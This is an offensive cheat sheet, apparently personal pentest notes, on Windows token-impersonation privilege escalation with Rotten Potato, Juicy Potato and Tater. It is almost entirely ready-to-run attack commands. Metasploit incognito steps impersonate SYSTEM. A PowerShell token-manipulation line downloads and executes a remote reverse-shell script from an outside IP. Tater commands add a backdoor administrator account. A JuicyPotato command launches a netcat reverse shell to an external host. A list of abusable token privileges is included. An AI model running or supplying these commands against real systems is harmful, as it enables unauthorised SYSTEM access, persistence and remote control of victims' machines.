Potatos and Tokens

Rotten Potato

How the Exploit Works:

Rotten Potato – Privilege Escalation from Service Accounts to SYSTEMfoxglovesec

Binary available at

https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

GitHub - foxglovesec/RottenPotato: RottenPotato local privilege escalation from service account to SYSTEMGitHub

GitHub - breenmachine/RottenPotatoNG: New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools.GitHub

Using Metasploit

# metasploit
getuid
getprivs
use incognito
list_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate_token "NT AUTHORITY\SYSTEM"

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"   

Using Tater.ps1

GitHub - Kevin-Robertson/Tater: Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from @breenmachine and @foxglovesecGitHub

Usage:

# To import with Import-Module:
Import-Module ./Tater.ps1

# To import using dot source method:
. ./Tater.ps1

Examples:

# Basic trigger 1 example
Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

# Basic trigger 2 example
Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

# Basic trigger 3 example - 2 steps
# Two system setup to get around port 80 being in-use on the privesc target
# WPAD System - 192.168.10.100 - this system will just serve up a wpad.dat file that will direct HTTP traffic on the privesc target to the non-80 HTTP port   
Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null"

# Privesc Target - 192.168.10.101
Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100

Tokens and Descriptions

Most commonly abused tokens

SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege

Abusing Token Privileges For LPEExploit Database

Juicy Potato

Watch ippsec video on Tally

https://ohpe.it/juicy-potato/

JuicyPotato.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.10 1234"        

https://github.com/decoder-it/juicy-potato

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

CLSID

http://ohpe.it/juicy-potato/CLSID/

Picture Source: https://snowscan.io/htb-writeup-ethereal/#